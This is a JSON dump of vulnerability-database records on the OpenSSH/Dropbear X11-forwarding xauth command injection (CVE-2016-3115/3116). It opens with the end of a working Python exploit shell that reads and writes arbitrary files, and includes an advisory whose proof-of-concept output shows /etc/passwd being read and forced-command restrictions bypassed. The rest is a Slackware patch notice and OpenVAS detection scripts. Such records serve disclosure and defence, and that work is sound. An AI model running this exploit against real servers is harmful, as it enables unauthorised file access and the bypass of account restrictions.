password==\".demoprivkey\":\n pkey = PRIVKEY\n password = None\n LOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys)\n \n LOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port))\n ex = SSHX11fwdExploit(hostname, port=port,\n username=username, password=password,\n pkey=pkey,\n timeout=10\n )\n LOGGER.info(\"connected!\")\n LOGGER.info (\"\"\"\nAvailable commands:\n .info\n .readfile <path>\n .writefile <path> <data>\n .exit .quit\n <any xauth command or type help>\n\"\"\")\n while True:\n cmd = raw_input(\"#> \").strip()\n if cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"):\n break\n elif cmd.lower().startswith(\".info\"):\n LOGGER.info(ex.exploit(\"\\ninfo\"))\n elif cmd.lower().startswith(\".readfile\"): \n 
LOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1]))\n elif cmd.lower().startswith(\".writefile\"):\n parts = cmd.split(\" \")\n LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))\n else:\n LOGGER.info(ex.exploit('\\n%s'%cmd))\n \n # just playing around \n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\n #print ex.exploit(\"\\ninfo\")\n #print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000\n #print ex.exploit(\"\\nlist\")\n #print ex.exploit(\"\\nnlist\")\n #print ex.exploit('\\nadd xx xx \"\\n')\n #print ex.exploit('\\ngenerate :0 . data \"')\n #print ex.exploit('\\n?\\n')\n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\n #print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\")\n LOGGER.info(\"--quit--\")", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDropBearSSHD 2015.71 - Command Injection", "edition": 1, "published": "2016-03-03T00:00:00", "title": "DropBearSSHD 2015.71 - Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115", "CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "EXPLOITPACK:F92411A645D85F05BDBD274FD222226F", "href": "", "sourceData": "VuNote\n============\n\n\tAuthor:\t\t<github.com/tintinweb>\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\n\tVersion: \t0.2\n\tDate: \t\tMar 3rd, 2016\n\t\n\tTag:\t\tdropbearsshd xauth command injection may lead to forced-command bypass\n\nOverview\n--------\n\n\tName:\t\t\tdropbear\n\tVendor:\t\t\tMatt Johnston\n\tReferences:\t\t* https://matt.ucc.asn.au/dropbear/dropbear.html [1]\n\t\n\tVersion:\t\t2015.71\n\tLatest Version:\t2015.71\n\tOther Versions:\t<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\n\tPlatform(s):\tlinux\n\tTechnology:\t\tc\n\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\n\tOrigin:\t\t\tremote\n\tMin. 
Privs.:\tpost auth\n\n\tCVE:\t\t\tCVE-2016-3116\n\n\n\nDescription\n---------\n\nquote website [1]\n\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\n\nSummary \n-------\n\nAn authenticated user may inject arbitrary xauth commands by sending an\nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it mitigates this vector.\n\nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \naccount restrictions. This is generally not expected.\n\nThe injected xauth commands are performed with the effective permissions of the \nlogged-in user, as the sshd has already dropped its privileges. \n\nQuick-Info:\n\n* requires: X11Forwarding yes\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\n* bypasses forced-commands (allows arbitr. read/write)\n\nCapabilities (xauth):\n\n* Xauth\n\t* write file: limited chars, xauthdb format\n\t* read file: limit lines cut at first \\s\n\t* infoleak: environment\n\t* connect to other devices (may allow port probing)\n\n\nsee attached PoC\n\n\nDetails\n-------\n\n// see annotated code below\n\n\t* x11req (svr-x11fwd.c:46)\n \n * execchild (svr-chansession.c:893)\n *- x11setauth (svr-x11fwd.c:129)\n\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\n`x11authprot` contains the x11 authentication method used (e.g. 
`MIT-MAGIC-COOKIE-1`)\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\nin a session specific datastore. When calling `execute` on that session, dropbear will\ncall `execchild` and - in case it was compiled with x11 support - set up x11 forwarding\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\nNote that neither `x11authcookie` nor `x11authprot` was sanitized or validated; they just contain\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\n`xauth` commands.\n\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\ncommand injection:\n\n\tSYNOPSIS\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\n\n\t\tadd displayname protocolname hexkey\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\n\t\t[n]extract filename displayname...\n\t\t[n]list [displayname...]\n\t\t[n]merge [filename...]\n\t\tremove displayname...\n\t\tsource filename\n\t\tinfo \n\t\texit\n\t\tquit\n\t\tversion\n\t\thelp\n\t\t?\n\t\t\nInteresting commands are:\n\t\n\tinfo\t - leaks environment information / path\n\t\t\t~# xauth info\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\tAuthority file: /root/.Xauthority\n\t\t\tFile new: yes\n\t\t\tFile locked: no\n\t\t\tNumber of entries: 0\n\t\t\tChanges honored: yes\n\t\t\tChanges made: no\n\t\t\tCurrent input: (argv):1\n\t\n\tsource\t - arbitrary file read (cut on first `\\s`)\n\t\t\t# xauth source /etc/shadow\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\n\t\t\t\t\t\t\n\textract - arbitrary file write \n\t\t\t * limited characters\n\t * in xauth.db format\n\t * since it is not compressed it can be combined with `xauth add` to \n\t first store data in the database and then 
export it to an arbitrary\n\t location e.g. to plant a shell or do other things.\n\t\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\n\t\t\t vulnerabilities in X.org\n\t\n\t\nSource\n------\n\nInline annotations are prefixed with `//#!`\n\n* handle x11 request, stores cookie in `chansess`\n\t```c\n\t/* called as a request for a session channel, sets up listening X11 */\n\t/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\n\tint x11req(struct ChanSess * chansess) {\n\t\n\t\tint fd;\n\t\n\t\t/* we already have an x11 connection */\n\t\tif (chansess->x11listener != NULL) {\n\t\t\treturn DROPBEAR_FAILURE;\n\t\t}\n\t\n\t\tchansess->x11singleconn = buf_getbyte(ses.payload);\n\t\tchansess->x11authprot = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11authcookie = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11screennum = buf_getint(ses.payload);\n\t```\n\t\n* set auth cookie/authprot\n\n\t```c\n\t/* This is called after switching to the user, and sets up the xauth\n\t * and environment variables. */\n\tvoid x11setauth(struct ChanSess *chansess) {\n\t\n\t\tchar display[20]; /* space for \"localhost:12345.123\" */\n\t\tFILE * authprog = NULL;\n\t\tint val;\n\t\n\t\tif (chansess->x11listener == NULL) {\n\t\t\treturn;\n\t\t}\n\t\n\t\t...\n\t\n\t\t/* popen is a nice function - code is strongly based on OpenSSH's */\n\t\tauthprog = popen(XAUTH_COMMAND, \"w\");\t\t\t\t\t\t\t\t\t\t//#! run xauth binary\n\t\tif (authprog) {\n\t\t\tfprintf(authprog, \"add %s %s %s\\n\",\n\t\t\t\t\tdisplay, chansess->x11authprot, chansess->x11authcookie);\t\t//#! 
\\n injection in cookie, authprot\n\t\t\tpclose(authprog);\n\t\t} else {\n\t\t\tfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\n\t\t}\n\t}\n\t```\n\nProof of Concept\n----------------\n\nPrerequisites: \n\n* install python 2.7.x\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\n* run `poc.py`\n\nNote: see cve-2016-3115 [3] for `poc.py`\n\n\t Usage: <host> <port> <username> <password or path_to_privkey>\n\t \n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n\t \n\npoc:\n\n1. configure one user (user1) for `force-commands`:\n\t```c \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user1/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\n\n\t#cat /etc/passwd\n\tuser1:x:1001:1001:,,,:/home/user1:/bin/bash\n\t```\n\t \n2. run dropbearsshd (x11fwd is on by default)\n\n\t```c\n\t#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\n\t[22861] Not backgrounding\n\t[22862] Child connection from 192.168.139.1:49597\n\t[22862] Forced command 'whoami'\n\t[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\n\t```\t\n\n3. 
`forced-commands` - connect with user1 and display env information\n\n\t```c\n\t#> python <host> 2222 user1 .demoprivkey\n\t\n\tINFO:__main__:add this line to your authorized_keys file: \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n\t\n\tINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\n\tINFO:__main__:connected!\n\tINFO:__main__:\n\tAvailable commands:\n\t .info\n\t .readfile <path>\n\t .writefile <path> <data>\n\t .exit .quit\n\t <any xauth command or type help>\n\t\n\t#> .info\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\n\tFile new: no\n\tFile locked: no\n\tNumber of entries: 2\n\tChanges honored: yes\n\tChanges made: no\n\tCurrent input: (stdin):2\n\tuser1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t...\n\t```\n\t\n4. `forced-commands` - read `/etc/passwd`\n\n\t```c\n\t...\n\t#> .readfile /etc/passwd\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\n\tsync:x:4:65534:sync:/bin:/bin/sync\n\t...\n\t```\n\t\t\n5. 
`forced-commands` - write `/tmp/testfile`\n\n\t```c\n\t#> .writefile /tmp/testfile1 `thisisatestfile`\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t#> INFO:__main__:/tmp/testfile1\n\t\n\t#> ls -lsat /tmp/testfile1\n\t4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\n\t\n\t#> cat /tmp/testfile1\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\n\t```\n\t\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\n\n\t```c\n\t#> generate 8.8.8.8:100\n\tDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\n\t\n\t#> tcpdump \n\tIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\n\t```\t\n\nFix\n---\n\n* Sanitize user-tainted input `chansess->x11authcookie`\n\n\nMitigation / Workaround\n------------------------\n\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\n\nNotes\n-----\n\nThanks to the OpenSSH team for coordinating the fix!\n\nVendor response see: changelog [4]\n\n\nReferences\n----------\n\n\t[1] https://matt.ucc.asn.au/dropbear/dropbear.html\n\t[2] http://linux.die.net/man/1/xauth\n\t[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\n\t[4] https://matt.ucc.asn.au/dropbear/CHANGES\n\t\nContact\n-------\n\n\thttps://github.com/tintinweb", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:34", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], 
"description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/openssh-7.2p2-i486-1_slack14.1.txz: Upgraded.\n This release fixes a security bug:\n sshd(8): sanitise X11 authentication credentials to avoid xauth\n command injection when X11Forwarding is enabled.\n For more information, see:\n http://www.openssh.com/txt/x11fwd.adv\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3115\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.2p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.2p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.2p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.2p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.2p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.2p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.2p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 
14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.2p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.2p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.2p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.2p2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.2p2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nb972be1994a7ad698b480314dda8215c openssh-7.2p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\naa409bb0ad9c425e16275ff5a5dec8b8 openssh-7.2p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2bcb8da4c750b54560a36306b72874d1 openssh-7.2p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n523287f90f00c280fad6e6de884d8ba8 openssh-7.2p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nd8276fcb0533d1871fa85d1eb4cd29b6 openssh-7.2p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nef9a81022cc622a405038d64508ab4da openssh-7.2p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n9a1707edf5463bb8561d4342b193db6c openssh-7.2p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd5bfb6d017ba5ace51aeb19a348793e0 openssh-7.2p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\naede849b3dacd510823c57f48f97b562 openssh-7.2p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n28a23b53f4b0ad1d39c174d85e434147 openssh-7.2p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n09af232cbf886c9cda11a774d753f87f n/openssh-7.2p2-i586-1.txz\n\nSlackware x86_64 -current package:\naeba7a5c4d0a91e5e35c9590b9c1d029 n/openssh-7.2p2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > 
upgradepkg openssh-7.2p2-i486-1_slack14.1.txz\n\nNext, restart the sshd daemon:\n > sh /etc/rc.d/rc.sshd restart", "modified": "2016-03-11T01:32:41", "published": "2016-03-11T01:32:41", "id": "SSA-2016-070-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.517960", "type": "slackware", "title": "[slackware-security] openssh", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310807983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807983", "type": "openvas", "title": "Fedora Update for gsi-openssh FEDORA-2016-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gsi-openssh FEDORA-2016-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807983\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:18:35 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gsi-openssh FEDORA-2016-08\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gsi-openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gsi-openssh on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-08\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"gsi-openssh\", rpm:\"gsi-openssh~7.2p2~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-03-17T22:57:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-03-17T00:00:00", "id": "OPENVAS:1361412562310120658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120658", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-668)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120658\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 16:05:02 +0200 (Thu, 17 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-668)\");\n script_tag(name:\"insight\", value:\"It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions.\");\n script_tag(name:\"solution\", value:\"Run yum update openssh to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-668.html\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = 
isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"auth\", rpm:\"auth~0.9.3~9.23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-ldap\", rpm:\"openssh-ldap~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~23.60.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-04-26T00:00:00", "id": "OPENVAS:1361412562310807942", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807942", "type": "openvas", "title": "Fedora Update for gsi-openssh FEDORA-2016-188267", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gsi-openssh FEDORA-2016-188267\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# 
(or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807942\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-26 05:18:22 +0200 (Tue, 26 Apr 2016)\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gsi-openssh FEDORA-2016-188267\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gsi-openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gsi-openssh on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-188267\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks 